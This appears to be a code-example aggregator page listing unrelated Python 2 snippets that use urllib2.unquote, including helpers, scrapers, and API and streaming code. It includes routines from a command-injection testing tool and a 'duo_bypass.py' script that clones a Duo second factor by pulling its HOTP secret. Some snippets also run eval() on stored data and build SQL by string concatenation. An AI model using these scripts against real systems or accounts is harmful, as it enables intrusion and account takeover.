    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
        response = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
        response = custom_header_injection_test(url, vuln_parameter, payload)

    else:
        # Check if the request method is GET (default).
        if http_request_method == "GET":
            # Check whether the 'INJECT_HERE' tag is specified.
            #url = parameters.do_GET_check(url)

            target = re.sub(settings.INJECT_TAG, payload, url)
            vuln_parameter = ''.join(vuln_parameter)
            request = urllib2.Request(target)

            # Check if defined extra headers.
            headers.do_check(request)

            # Get the response of the request
            response = requests.get_request_response(request)

        else:
            # Otherwise, the request method is POST.
            parameter = menu.options.data
            parameter = urllib2.unquote(parameter)

            # Check whether the 'INJECT_HERE' tag is specified.
            parameter = parameters.do_POST_check(parameter)

            # Define the POST data
            if settings.IS_JSON == False:
                data = re.sub(settings.INJECT_TAG, payload, parameter)
                request = urllib2.Request(url, data)
            else:
                payload = payload.replace("\"", "\\\"")
                data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
                              parameter)
                data = json.loads(data, strict=False)
                request = urllib2.Request(url, json.dumps(data))

            # Check if defined extra headers.
            headers.do_check(request)

            # Get the response of the request
            response = requests.get_request_response(request)

    return response
Пример #47
0
def encode_url(url):
    if url == unquote(url):
        return quote(url.encode('utf-8'), safe='~@#$&()*!+=:;,.?/\'')
    else:
        return url
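
A hedged usage sketch, assuming quote and unquote are the urllib2 versions imported elsewhere in this module; the already-encoded check makes the function safe to apply twice without double-encoding:

raw = u'http://example.com/a b'
once = encode_url(raw)     # 'http://example.com/a%20b'
twice = encode_url(once)   # unchanged, the input already carries an escape
print once == twice        # -> True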
Пример #48
0
    def run(self, date):

        db_class = self.config.primary_destination.database_class
        primary_database = db_class(self.config.primary_destination)
        tx_class = self.config.primary_destination.transaction_executor_class
        primary_transaction = tx_class(
            self.config,
            primary_database,
        )
        transactions = [primary_transaction]

        db_class = self.config.secondary_destination.database_class
        # The reason for checking if this is anything at all is
        # because one way of disabling the secondary destination
        # is to set the database_class to an empty string.
        if db_class:
            secondary_database = db_class(self.config.secondary_destination)
            if secondary_database.config != primary_database.config:
                # The secondary really is different from the first one.
                # By default, if not explicitly set, it'll pick up the same
                # resource values as the first one.
                tx_class = (self.config.secondary_destination.
                            transaction_executor_class)
                secondary_transaction = tx_class(
                    self.config,
                    secondary_database,
                )
                transactions.append(secondary_transaction)

        target_date = (date - datetime.timedelta(days=1)).strftime('%Y-%m-%d')

        raw_adi_logs_pathname = os.path.join(
            tempfile.gettempdir(),
            "%s.raw_adi_logs.TEMPORARY%s" % (target_date, '.txt'))
        try:
            with codecs.open(raw_adi_logs_pathname, 'w', 'utf-8') as f:
                hive = pyhs2.connect(
                    host=self.config.hive_host,
                    port=self.config.hive_port,
                    authMechanism=self.config.hive_auth_mechanism,
                    user=self.config.hive_user,
                    password=self.config.hive_password,
                    database=self.config.hive_database,
                    # the underlying TSocket setTimeout() wants milliseconds
                    timeout=self.config.timeout * 1000)

                cur = hive.cursor()
                query = self.config.query % target_date
                cur.execute(query)
                rows_written = 0
                for row in cur:
                    if None in row:
                        continue
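                    # Tab-separate the columns: strings are unquoted, stripped of
                    # control characters and backslash-escaped; everything else is
                    # stringified as-is.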
                    f.write("\t".join(
                        self.remove_control_characters(urllib2.unquote(v)).
                        replace('\\', '\\\\') if isinstance(v, basestring
                                                            ) else str(v)
                        for v in row))
                    f.write("\n")
                    rows_written += 1

            if not rows_written:
                raise NoRowsWritten('hive yielded no rows to write')

            self.config.logger.info('Wrote %d rows from doing hive query' %
                                    rows_written)
            for transaction in transactions:
                transaction(self._database_transaction, raw_adi_logs_pathname,
                            target_date)

        finally:
            if os.path.isfile(raw_adi_logs_pathname):
                os.remove(raw_adi_logs_pathname)
Пример #49
0
    def check_injection(separator, TAG, cmd, prefix, suffix, whitespace,
                        http_request_method, url, vuln_parameter, alter_shell,
                        filename):
        if alter_shell:
            # Classic decision payload (check if host is vulnerable).
            payload = cb_payloads.cmd_execution_alter_shell(
                separator, TAG, cmd)
        else:
            # Classic decision payload (check if host is vulnerable).
            payload = cb_payloads.cmd_execution(separator, TAG, cmd)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        # Whitespace fixation
        payload = payload.replace(" ", whitespace)

        # Perform payload modification
        payload = checks.perform_payload_modification(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL >= 1:
            info_msg = "Executing the '" + cmd + "' command... "
            sys.stdout.write(settings.print_info_msg(info_msg))
            sys.stdout.flush()
            sys.stdout.write("\n" + settings.print_payload(payload) + "\n")

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            response = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            response = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            response = referer_injection_test(url, vuln_parameter, payload)

        # Check if defined host with "INJECT_HERE" tag
        elif menu.options.host and settings.INJECT_TAG in menu.options.host:
            response = host_injection_test(url, vuln_parameter, payload)

        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
            response = custom_header_injection_test(url, vuln_parameter,
                                                    payload)

        else:
            # Check if the request method is GET (default).
            if http_request_method == "GET":

                # Check whether the 'INJECT_HERE' tag is specified.
                #url = parameters.do_GET_check(url)
                target = url.replace(settings.INJECT_TAG, payload)
                vuln_parameter = ''.join(vuln_parameter)
                request = urllib2.Request(target)

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request.
                response = requests.get_request_response(request)

            else:
                # Otherwise, the request method is POST.
                parameter = menu.options.data
                parameter = urllib2.unquote(parameter)
                # Check whether the 'INJECT_HERE' tag is specified.
                parameter = parameters.do_POST_check(parameter)
                parameter = parameter.replace("+", "%2B")
                # Define the POST data
                if settings.IS_JSON:
                    data = parameter.replace(
                        settings.INJECT_TAG,
                        urllib.unquote(payload.replace("\"", "\\\"")))
                    try:
                        data = checks.json_data(data)
                    except ValueError:
                        pass
                elif settings.IS_XML:
                    data = parameter.replace(settings.INJECT_TAG,
                                             urllib.unquote(payload))
                else:
                    data = parameter.replace(settings.INJECT_TAG, payload)
                request = urllib2.Request(url, data)

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request.
                response = requests.get_request_response(request)

        return response
Пример #50
0
def quote_url(url):
    return encode_url(unquote(url).decode('utf-8'))
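
A hedged usage sketch, assuming unquote and the encode_url helper shown earlier are in scope: the URL is first fully decoded, then re-encoded, so partially or inconsistently escaped input comes out uniformly quoted:

print quote_url('http://example.com/caf%C3%A9 menu')
# -> http://example.com/caf%C3%A9%20menu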
Пример #51
0
import pyotp
import requests
import base64
import json
import sys
from urllib2 import unquote


if __name__ == '__main__':
	if len(sys.argv) < 2:
	    print "Usage: python duo_bypass.py <url to duo qr>"; exit()

	qr_url = sys.argv[1]
	data = unquote(qr_url.split('=')[1])

	hostb64 = data.split('-')[1]

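	# The hostname arrives base64-encoded with its '=' padding stripped; restore the padding before decoding.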
	host = base64.b64decode(hostb64 + '='*(-len(hostb64) % 4))
	code = data.split('-')[0].replace('duo://', '')

	url = 'https://{host}/push/v2/activation/{code}'.format(host=host, code=code)
	r = requests.post(url)
	response = json.loads(r.text)

	secret = base64.b32encode(response['response']['hotp_secret'])
	print "HOTP Secret:", secret

	print "10 Next OneTime Passwords!"
	# Generate 10 Otps!
	hotp = pyotp.HOTP(secret)
	for _ in xrange(10):
		print hotp.at(_)
Пример #52
0
def fetchMiaopaiData():
    uname = '/app/yxtk/script/useragent.txt'
    f1 = open("/app/yxtk/script/data/cosmopolitan.sql", 'w', buffering=-1)
    with open(uname) as f:
        useragents = f.readlines()
    userAgent = random.choice(useragents)
    headers = {
        'Accept':
        'application/json, text/javascript, */*; q=0.01',
        'Accept-Encoding':
        'gzip, deflate, sdch',
        'Accept-Language':
        'zh-CN,zh;q=0.8',
        'Cache-Control':
        'max-age=0',
        'Connection':
        'keep-alive',
        'Host':
        'http://fashion.cosmopolitan.com.cn/howto/',
        'Referer':
        'http://fashion.cosmopolitan.com.cn/howto/',
        'Upgrade-Insecure-Requests':
        '1',
        'X-Requested-With':
        'XMLHttpRequest',
        'User-Agent':
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'
    }
    while True:
        for j in range(1, 8):
            time.sleep(1)
            if j == 1:
                url = 'http://fashion.cosmopolitan.com.cn/howto/'
            if j == 2:
                url = 'http://fashion.cosmopolitan.com.cn/now/'
            if j == 3:
                url = 'http://fashion.cosmopolitan.com.cn/catwalk/'
            if j == 4:
                url = 'http://fashion.cosmopolitan.com.cn/streetstyle/'
            if j == 5:
                url = 'http://fashion.cosmopolitan.com.cn/goddess/'
            if j == 6:
                url = 'http://fashion.cosmopolitan.com.cn/cookies/'
            if j == 7:
                url = 'http://lohas.cosmopolitan.com.cn/bigger/'
            print url
            try:
                encoding_support = ContentEncodingProcessor
                req = urllib2.Request(url)
                res = urllib2.urlopen(req)
                html = unicode(res.read(), "GBK")
                res.close()
                doc = pq(html)
                #doc = pq(url
                divs = doc('div.s_list')
                for li in divs.items():
                    url = li('a').attr('href')
                    m = re.findall(r'(\w+[0-9]+)\w*', str(url))
                    clo_id = m[2]
                    print url
                    title = "\" " + li('h3').children('a').text().encode(
                        'utf8') + " \""
                    title = title.replace("\n", '')
                    title = title.replace(",", ',')
                    print title
                    pic = li('a').children('img').attr('src')
                    print pic
                    imageUrl = qiniuUpdate(pic.strip())
                    date = li('div.time').children('span').text()

                    req = urllib2.Request(url)
                    res = urllib2.urlopen(req)
                    html1 = unicode(res.read(), 'GBK')
                    html1 = re.sub(r'<script>(.*?)</script>', '', html1)
                    res.close()
                    doc1 = pq(html1)
                    con = doc1('div.detail_c')
                    con('img').removeAttr("style")
                    con('img').removeAttr("width")
                    con('img').removeAttr("height")
                    con('img').attr("style", "width:100%")
                    p = con('div.detail_c').html()
                    if p is None or p == '':
                        continue
                    p = re.sub(r'&#13;', '', p)
                    p = re.sub(r'<style.*>([\S\s\t]*?)</style>', '', p)
                    p = re.sub(r'<script.*>([\S\s\t]*?)</script>', '', p)
                    p = re.sub(r'<p[^>]*>', '<p>', p)
                    p = re.sub(r'<(?!img|br|p|/p).*?>', '', p)
                    p = re.sub(r'\r', '', p)
                    p = re.sub(r'\n', '', p)
                    p = re.sub(r'\s', '', p)
                    p = re.sub(r'src=', ' src=', p)

                    newqiniu = pq(p)
                    imgs = newqiniu('img')
                    for image in imgs.items():
                        imgurl = image('img').attr('src')
                        newimgurl = qiniuUpdate(imgurl.strip())
                        p = p.replace(str(imgurl), str(newimgurl))
                    sql = "INSERT INTO 3rd_clothes(id,creator,modifier,create_time,modify_time,is_deleted,clothes_id,title,clothes_date,img_url,sort,user_id,thumbnail_url,source,tag,content,push_flag,recommend_flag,view_status)VALUES(NULL,'sys','sys',now(),now(),'n','" + clo_id + "'," + title.strip(
                    ) + ",'" + date.strip() + "','" + pic.strip(
                    ) + "','0','','" + imageUrl + "','时尚COSMO','','" + p.strip(
                    ) + "',0,NULL,0);" + '\n'
                    print sql
                    f1.writelines(sql)
                    file_name = urllib2.unquote(
                        pic.strip()).decode('utf8').split('/')[-1]
                    os.remove('/app/yxtk/script/' + file_name)
            except Exception as e:
                print e
        break
    f1.close()
Пример #53
0
def xmlProxy(originalXMLWebserviceURL):
  decodedURL = urllib2.unquote(originalXMLWebserviceURL)
  f = urllib2.urlopen(decodedURL)
  xml = f.read()
  parsedXML = xmltodict.parse(xml)
  return json.dumps(parsedXML)
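
A hedged usage sketch; the address below is a hypothetical placeholder, percent-encoded the way a caller would pass it:

encoded = 'http%3A%2F%2Fexample.com%2Ffeed.xml'
print xmlProxy(encoded)  # JSON text of the parsed XML document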
Пример #54
0
def get_portal(language=None, country=None, categories=None):
    """
    get a list of text and images for feed/rss and labels
    """

    if not language or not country:
        return None
    if language not in LANGUAGES:
        return None
    if country not in COUNTRIES:
        return None

    search_limit = 70
    images_limit = 1
    portal_data = {}
    categories = urllib2.unquote(categories.strip()).split(',')

    for user_subscription in categories:
        user_subscription = user_subscription.replace('+', ' ')
        category, feed = user_subscription.split('*|*')
        entries = get_latest_entries(
            language=language, country=country, category=category, feed=feed,
            limit=search_limit)
        # 'category A': [{'title':'xxx', 'image':'http://yyy.com/zzz.jpg'}]
        # image: category_image
        portal_data[user_subscription] = []
        text_image_item = None
        for entry in entries:
            # only one text_image is necessary
            if 'text_image' in entry and entry[
                'text_image'] and not text_image_item:
                if isinstance(entry['text_image'], str):
                    entry['text_image'] = eval(entry['text_image'])
                text_image = entry['text_image']
                text_image_item = {
                    'title': entry['title'], 'image': text_image,
                    'updated': entry['updated']}

            # search for category_image
            if 'category_image' in entry and entry['category_image'] and entry[
                'category_image'] != 'None' and entry[
                'category_image'] != 'null':
                if isinstance(entry['category_image'], str):
                    entry['category_image'] = eval(entry['category_image'])
                item = {'title': entry['title'], 'image': entry[
                    'category_image'], 'updated': entry['updated']}
                portal_data[user_subscription].append(item)
                # limit the number of category_image entries to images_limit
                if len(portal_data[user_subscription]) == images_limit:
                    break

        # can't find any category image, use text image instead, if available
        if not portal_data[user_subscription] and text_image_item:
            portal_data[user_subscription].append(text_image_item)

    # special formatting for android-end
    output = []
    for k, v in portal_data.iteritems():
        if k and v:
            category, feed = k.split('*|*')
            output.append(
                {'Category': category, 'Feed': feed, 'Images': v})
    return {'Categories': output}
Пример #55
0
def urlDecode(encodedString):
    decodedString = urllib2.unquote(encodedString.encode("utf8"))
    return decodedString
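
A hedged round-trip check: the escapes are resolved after the text is encoded to UTF-8 bytes, so multi-byte characters survive (output shown for a UTF-8 terminal):

print urlDecode(u'caf%C3%A9')  # -> café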
Пример #56
0
 def blob(self, method, account, path, body=None, headers=None, tag=None):
     debug('blob: %s %s %s %s %s\n' %
           (method, account, path, repr(body[:1024]) if isinstance(
               body, basestring) else str(body), headers))
     headers_dict = {}
     if headers is not None:
         for h in headers:
             name, val = h.split(':', 1)
             name = name.strip().lower()
             val = val.strip()
             headers_dict[name] = val
     if body and 'content-type' not in headers_dict:
         headers_dict['content-type'] = 'application/octet-stream'
         md5 = hashlib.md5()
         md5.update(body)
         headers_dict['content-md5'] = base64.b64encode(md5.digest())
     date = time.strftime('%a, %d %b %Y %H:%M:%S GMT', time.gmtime())
     headers_dict['x-ms-date'] = date
     if 'x-ms-version' not in headers_dict:
         headers_dict['x-ms-version'] = '2015-04-05'
     if account is None:
         m = re.match(
             r'https?://([^\.]+)\.blob\.%s(.*)$' %
             self.environment.core.replace('.', '\\.'), path)
         if m:
             account = m.group(1)
             path = m.group(2)
     markers = []
     result = []
     while True:
         marker_path = path
         if markers:
             marker_path += '&marker=' + markers[0]
         path_for_sig, sep, query = marker_path.partition('?')
         if query:
             params = {}
             for p in query.split('&'):
                 n, v = p.split('=', 1)
                 v = urllib2.unquote(v)
                 if '\n' in v or ',' in v:
                     raise Exception('cannot sign url with "\\n" or ","')
                 if n not in params:
                     params[n] = []
                 params[n].append(v)
             for n in sorted(params):
                 path_for_sig += ('\n' + urllib2.unquote(n) + ':' +
                                  ','.join(params[n]))
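          # Assemble the Shared Key string-to-sign: the HTTP verb, the standard
          # headers in their fixed order, the sorted x-ms-* headers, and finally
          # the canonicalised resource appended a few lines below.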
         data = (
             method + '\n' + headers_dict.get('content-encoding', '') +
             '\n' + headers_dict.get('content-language', '') + '\n' +
             (str(len(body)) if body else '') + '\n' +  # content-length
             headers_dict.get('content-md5', '') + '\n' +
             headers_dict.get('content-type', '') + '\n' +
             headers_dict.get('date', '') + '\n' +
             headers_dict.get('if-modified-since', '') + '\n' +
             headers_dict.get('if-match', '') + '\n' +
             headers_dict.get('if-none-match', '') + '\n' +
             headers_dict.get('if-unmodified-since', '') + '\n' +
             headers_dict.get('range', '') + '\n')
         for h in sorted(headers_dict):
             if h.startswith('x-ms'):
                 data += h + ':' + headers_dict[h] + '\n'
         account, key = self.account_key(account)
         data += '/' + account + path_for_sig
         sig = base64.b64encode(
             hmac.HMAC(base64.b64decode(key), data,
                       hashlib.sha256).digest())
         headers_dict['authorization'] = 'SharedKey ' + account + ':' + sig
         headers = ['%s: %s' % (n, headers_dict[n]) for n in headers_dict]
         h, b = request(method,
                        'https://' + account + '.blob.' +
                        self.environment.core + marker_path,
                        body=body,
                        headers=headers,
                        pool=self.pool,
                        max_time=self.max_time)
         if not tag:
             return h, b
         result += [e for e in b.getElementsByTagName(tag)]
         markers = values(b, 'NextMarker')
         if not markers:
             break
     b = xml.dom.minidom.parseString('<' + tag + 's/>')
     for e in result:
         b.documentElement.appendChild(e)
     return {}, b
Пример #57
0
    def test_with_two_batch_open(self):
        self.batch.open_for_location(self.location)
        self.batch_1.open_for_location(self.location)

        self.assertEquals(HouseholdMemberBatchCompletion.objects.count(), 0)

        mock_filter = MagicMock()
        mock_filter.exists.return_value = True
        with patch.object(RandomHouseHoldSelection.objects,
                          'filter',
                          return_value=mock_filter):
            with patch.object(USSDSurvey, 'is_active', return_value=False):
                self.reset_session()

            self.choose_menu_to_take_survey()
            self.select_household()
            response = self.select_household_member()
            response_string = "responseString=%s&action=request" % self.question_1.to_ussd(
            )
            self.assertEquals(urllib2.unquote(response.content),
                              response_string)

            response = self.respond("1")
            response_string = "responseString=%s&action=request" % self.question_2.to_ussd(
            )
            self.assertEquals(urllib2.unquote(response.content),
                              response_string)

            response = self.respond("1")
            response_string = "responseString=%s&action=request" % self.question_3.to_ussd(
            )
            self.assertEquals(urllib2.unquote(response.content),
                              response_string)

            self.assertEquals(HouseholdMemberBatchCompletion.objects.count(),
                              1)
            household_completed = HouseholdMemberBatchCompletion.objects.latest(
                'id')
            self.assertEquals(household_completed.household, self.household)
            self.assertEquals(household_completed.householdmember,
                              self.household_head.get_member())
            self.assertEquals(household_completed.investigator,
                              self.investigator)
            self.assertEquals(household_completed.batch, self.batch)

            response = self.respond("1")
            response_string = "responseString=%s&action=request" % self.question_4.to_ussd(
            )
            self.assertEquals(urllib2.unquote(response.content),
                              response_string)

            response = self.respond("1")
            response_string = "responseString=%s&action=request" % USSD.MESSAGES[
                'HOUSEHOLD_COMPLETION_MESSAGE']
            self.assertEquals(urllib2.unquote(response.content),
                              response_string)

            self.assertEquals(HouseholdMemberBatchCompletion.objects.count(),
                              2)
            household_completed = HouseholdMemberBatchCompletion.objects.latest(
                'id')
            self.assertEquals(household_completed.household, self.household)
            self.assertEquals(household_completed.householdmember,
                              self.household_head.get_member())
            self.assertEquals(household_completed.investigator,
                              self.investigator)
            self.assertEquals(household_completed.batch, self.batch_1)
Пример #58
0
def getLinks(connection, location, done, ignore, kbEntries):
    mkdir(location)
    try:
        page = 0
        pageSize = 50
        getPage = True
        while getPage:
            params = {"count": pageSize, "offset": page * pageSize}
            print "GET: " + connection[
                "baseUrl"] + location + "?" + "count=" + str(
                    pageSize) + "&offset=" + str(
                        page * pageSize) + " -> Done: " + str(len(done))
            start = connection["session"].get(
                url=connection["baseUrl"] + location,
                timeout=60,
                params=params,
                auth=(connection["user"], connection["passwd"]),
                verify=False).content
            start = re.sub(
                r"<updated>.*?<\/updated>", "", start
            )  # Because this is going into git, we remove these as they will change
            start = re.sub(r"<s:key name=\"next_scheduled_time\">.*?</s:key>",
                           "", start)  # and we want this to be clean.
            if start.startswith("<?xml") and not start.lower(
            ) == "internal rest handler error":
                xmlData = xml.dom.minidom.parseString(start)
                if xmlData.getElementsByTagName("opensearch:totalResults"):
                    searchSize = int(
                        xmlData.getElementsByTagName("opensearch:totalResults")
                        [0].firstChild.wholeText)
                    offset = int(
                        xmlData.getElementsByTagName("opensearch:startIndex")
                        [0].firstChild.wholeText)
                else:
                    searchSize = 0
                    offset = 0
                if searchSize == 1:  # By default we only will save single elements, not lists
                    fh = open(location + "/object-" + str(page) + ".xml", "w")
                    fh.write(start)
                    fh.close()
                if offset + pageSize >= searchSize:
                    getPage = False
                else:
                    page = page + 1
                for link in xmlData.getElementsByTagName("link"):
                    thing = urllib2.unquote(link.getAttribute("href")[1:])
                    if link.getAttribute("rel") in ["list", "alternate"]:
                        inIgnore = False
                        for item in ignore:
                            if thing.startswith(item):
                                inIgnore = True
                    else:
                        inIgnore = True
                    if not thing in done and not inIgnore:
                        done.append(thing)
                        done = getLinks(connection, thing, done, ignore,
                                        kbEntries)
                        # Get round annoying splunk bug that doesn't pull it all back :(
                        if location == "services/apps/local":
                            hack = thing.replace(
                                "servicesNS/nobody/system/apps/local/",
                                "servicesNS/nobody/")
                            for entry in kbEntries:
                                want = hack + "/admin" + entry
                                if not want in done:
                                    done.append(want)
                                    done = getLinks(connection, want, done,
                                                    ignore, kbEntries)
            else:
                fh = open(location + "/object.txt", "w")
                fh.write(start)
                fh.close()
                getPage = False
        return done
    except Exception as e:
        print "oops!"
        print e
        return done
Пример #59
0
    def handleRequest(self, headers_only):
        # Check if third parameter exists
        # …/pid/blablablablabla/video.mpg
        #                      |_________|
        # And if it ends with regular video extension
        try:
            if not self.path.endswith(
                ('.3gp', '.avi', '.flv', '.mkv', '.mov', '.mp4', '.mpeg',
                 '.mpg', '.ogv', '.ts')):
                logger.error(
                    "Request seems like valid but no valid video extension was provided"
                )
                self.dieWithError(400)
                return
        except IndexError:
            self.dieWithError(400)  # 400 Bad Request
            return

        # Limit concurrent connections
        if 0 < AceConfig.maxconns <= AceStuff.clientcounter.total:
            logger.debug("Maximum connections reached, can't serve this")
            self.dieWithError(503)  # 503 Service Unavailable
            return

        # Pretend to work fine with Fake UAs or HEAD request.
        useragent = self.headers.get('User-Agent')
        fakeua = useragent and useragent in AceConfig.fakeuas
        if headers_only or fakeua:
            if fakeua:
                logger.debug("Got fake UA: " + self.headers.get('User-Agent'))
            # Return 200 and exit
            self.send_response(200)
            self.send_header("Content-Type", "video/mpeg")
            self.end_headers()
            self.closeConnection()
            return

        self.path_unquoted = urllib2.unquote(self.splittedpath[2])
        # Make list with parameters
        self.params = list()
        for i in xrange(3, 8):
            try:
                self.params.append(int(self.splittedpath[i]))
            except (IndexError, ValueError):
                self.params.append('0')

        # Adding client to clientcounter
        clients = AceStuff.clientcounter.add(self.path_unquoted, self.clientip)
        # If we are the only client but still successfully got an ace from
        # clientcounter, then somebody is waiting in the videodestroydelay state
        self.ace = AceStuff.clientcounter.getAce(self.path_unquoted)
        if not self.ace:
            shouldcreateace = True
        else:
            shouldcreateace = False

        # Use PID as VLC ID if PID requested
        # Or torrent url MD5 hash if torrent requested
        if self.reqtype == 'pid':
            self.vlcid = self.path_unquoted
        else:
            self.vlcid = hashlib.md5(self.path_unquoted).hexdigest()

        # If we don't use VLC and we're not the first client
        if clients != 1 and not AceConfig.vlcuse:
            AceStuff.clientcounter.delete(self.path_unquoted, self.clientip)
            logger.error(
                "Not the first client, cannot continue in non-VLC mode")
            self.dieWithError(503)  # 503 Service Unavailable
            return

        if shouldcreateace:
            # If we are the only client, create AceClient
            try:
                self.ace = aceclient.AceClient(
                    AceConfig.acehost,
                    AceConfig.aceport,
                    connect_timeout=AceConfig.aceconntimeout,
                    result_timeout=AceConfig.aceresulttimeout)
                # Adding AceClient instance to pool
                AceStuff.clientcounter.addAce(self.path_unquoted, self.ace)
                logger.debug("AceClient created")
            except aceclient.AceException as e:
                logger.error("AceClient create exception: " + repr(e))
                AceStuff.clientcounter.delete(self.path_unquoted,
                                              self.clientip)
                self.dieWithError(502)  # 502 Bad Gateway
                return

        # Send fake headers if this User-Agent is in fakeheaderuas tuple
        if fakeua:
            logger.debug("Sending fake headers for " + useragent)
            self.send_response(200)
            self.send_header("Content-Type", "video/mpeg")
            self.end_headers()
            # Do not send real headers at all
            self.headerssent = True

        try:
            self.hanggreenlet = gevent.spawn(self.hangDetector)
            logger.debug("hangDetector spawned")
            gevent.sleep()

            # Initializing AceClient
            if shouldcreateace:
                self.ace.aceInit(gender=AceConfig.acesex,
                                 age=AceConfig.aceage,
                                 product_key=AceConfig.acekey,
                                 pause_delay=AceConfig.videopausedelay,
                                 seekback=AceConfig.videoseekback)
                logger.debug("AceClient inited")
                if self.reqtype == 'pid':
                    contentinfo = self.ace.START(
                        self.reqtype, {
                            'content_id': self.path_unquoted,
                            'file_indexes': self.params[0]
                        })
                elif self.reqtype == 'torrent':
                    paramsdict = dict(
                        zip(aceclient.acemessages.AceConst.START_TORRENT,
                            self.params))
                    paramsdict['url'] = self.path_unquoted
                    contentinfo = self.ace.START(self.reqtype, paramsdict)
                logger.debug("START done")

            # Getting URL
            self.url = self.ace.getUrl(AceConfig.videotimeout)
            # Rewriting host for remote Ace Stream Engine
            self.url = self.url.replace('127.0.0.1', AceConfig.acehost)
            self.errorhappened = False

            if shouldcreateace:
                logger.debug("Got url " + self.url)
                # If using VLC, add this url to VLC
                if AceConfig.vlcuse:
                    # Force ffmpeg demuxing if set in config
                    if AceConfig.vlcforceffmpeg:
                        self.vlcprefix = 'http/ffmpeg://'
                    else:
                        self.vlcprefix = ''

                    self.ace.pause()
                    # Sleeping videodelay
                    gevent.sleep(AceConfig.videodelay)
                    self.ace.play()

                    AceStuff.vlcclient.startBroadcast(
                        self.vlcid, self.vlcprefix + self.url,
                        AceConfig.vlcmux, AceConfig.vlcpreaccess)
                    # Sleep a bit, because sometimes VLC doesn't open port in
                    # time
                    gevent.sleep(0.5)

            # Building new VLC url
            if AceConfig.vlcuse:
                self.url = 'http://' + AceConfig.vlchost + \
                    ':' + str(AceConfig.vlcoutport) + '/' + self.vlcid
                logger.debug("VLC url " + self.url)

            # Sending client headers to videostream
            self.video = urllib2.Request(self.url)
            for key in self.headers.dict:
                self.video.add_header(key, self.headers.dict[key])

            self.video = urllib2.urlopen(self.video)

            # Sending videostream headers to client
            if not self.headerssent:
                self.send_response(self.video.getcode())
                if self.video.info().dict.has_key('connection'):
                    del self.video.info().dict['connection']
                if self.video.info().dict.has_key('server'):
                    del self.video.info().dict['server']
                if self.video.info().dict.has_key('transfer-encoding'):
                    del self.video.info().dict['transfer-encoding']
                if self.video.info().dict.has_key('keep-alive'):
                    del self.video.info().dict['keep-alive']

                for key in self.video.info().dict:
                    self.send_header(key, self.video.info().dict[key])
                # End headers. Next goes video data
                self.end_headers()
                logger.debug("Headers sent")

            if not AceConfig.vlcuse:
                self.ace.pause()
                # Sleeping videodelay
                gevent.sleep(AceConfig.videodelay)
                self.ace.play()

            # Run proxyReadWrite
            self.proxyReadWrite()

            # Waiting until hangDetector is joined
            self.hanggreenlet.join()
            logger.debug("Request handler finished")

        except (aceclient.AceException, vlcclient.VlcException,
                urllib2.URLError) as e:
            logger.error("Exception: " + repr(e))
            self.errorhappened = True
            self.dieWithError()
        except gevent.GreenletExit:
            # hangDetector told us about client disconnection
            pass
        except Exception:
            # Unknown exception
            logger.error(traceback.format_exc())
            self.errorhappened = True
            self.dieWithError()
        finally:
            logger.debug("END REQUEST")
            AceStuff.clientcounter.delete(self.path_unquoted, self.clientip)
            if not self.errorhappened and not AceStuff.clientcounter.get(
                    self.path_unquoted):
                # If no error happened and we are the only client
                logger.debug("Sleeping for " +
                             str(AceConfig.videodestroydelay) + " seconds")
                gevent.sleep(AceConfig.videodestroydelay)
            if not AceStuff.clientcounter.get(self.path_unquoted):
                logger.debug("That was the last client, destroying AceClient")
                if AceConfig.vlcuse:
                    try:
                        AceStuff.vlcclient.stopBroadcast(self.vlcid)
                    except:
                        pass
                self.ace.destroy()
                AceStuff.clientcounter.deleteAce(self.path_unquoted)
Example #60
0
def application(environ, start_response):
    path = environ['PATH_INFO']
    method = environ['REQUEST_METHOD']
    if method == 'POST':
        try:
            request_body_size = int(environ['CONTENT_LENGTH'])
            request_body = environ['wsgi.input'].read(request_body_size)

            #http://stackoverflow.com/questions/17417620/python-requests-encoding-post-data
            decoded_request = urllib2.unquote(request_body).decode('utf-8')
            logger.info("Received message from worker: %s" %
                        decoded_request[5:])

            parsed = json.loads(
                decoded_request[5:])  # Skip first 5 characters ("body=...")
            info = "FeedID: " + str(
                parsed['environment']['id']) + ", Channel: " + str(
                    parsed['triggering_datastream']['id']) + ", Value: " + str(
                        parsed['triggering_datastream']['value']['value']
                    ) + ", Time: " + str(parsed['triggering_datastream']['at'])
            logger.info("Received message from worker: %s" % info)
            #logger.info("Received message from worker: %s" % str(scipy.version.version))

            # Begin Processing for Xively
            forecast = get_forecast(url)

            # Forecast for 0.1"
            pqpf, pop, qpf, epoch = get_pqpf(forecast)
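            # pqpf: probability of exceeding the 0.1 in threshold above;
            # pop, qpf: probability of precipitation and forecast amount;
            # epoch: forecast timestamp (all logged below).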
            post_forecast(pqpf * 100)

            # Forecast for 0.01"
            pqpf_01 = get_pqpf(forecast, amt=0.01)[0]
            post_forecast(pqpf_01 * 100, channel='p_rain001')
            logger.info(
                "Received message from worker: at: %f, pop: %2d, qpf: %4s, pqpf(0.1): %2.2f, pqpf(0.01): %2.2f"
                % (epoch, pop, qpf, pqpf * 100, pqpf_01 * 100))

            # Get Change in Depth over Time
            dxdt = dchannel_dt(channel='depth_sonic')
            # invert values for sonic sensor, convert to mm/5 mins
            dxdt = [-d / 12 for d in dxdt]
            update_channel(value=dxdt[-1], channel='delta_depth_sonic')
            logger.info("Received message from worker: dQ/dt: %f" % dxdt[-1])

            #tf_bottle = sampled_recently(duration = 60)
            #tf_sonic  = sampled_recently(duration = 60, channel = 'depth_sonic')
            #logger.info("Received message from worker: Recently sampled.. bottle: %s; sonic: %s" % (str(tf_bottle),str(tf_sonic)))

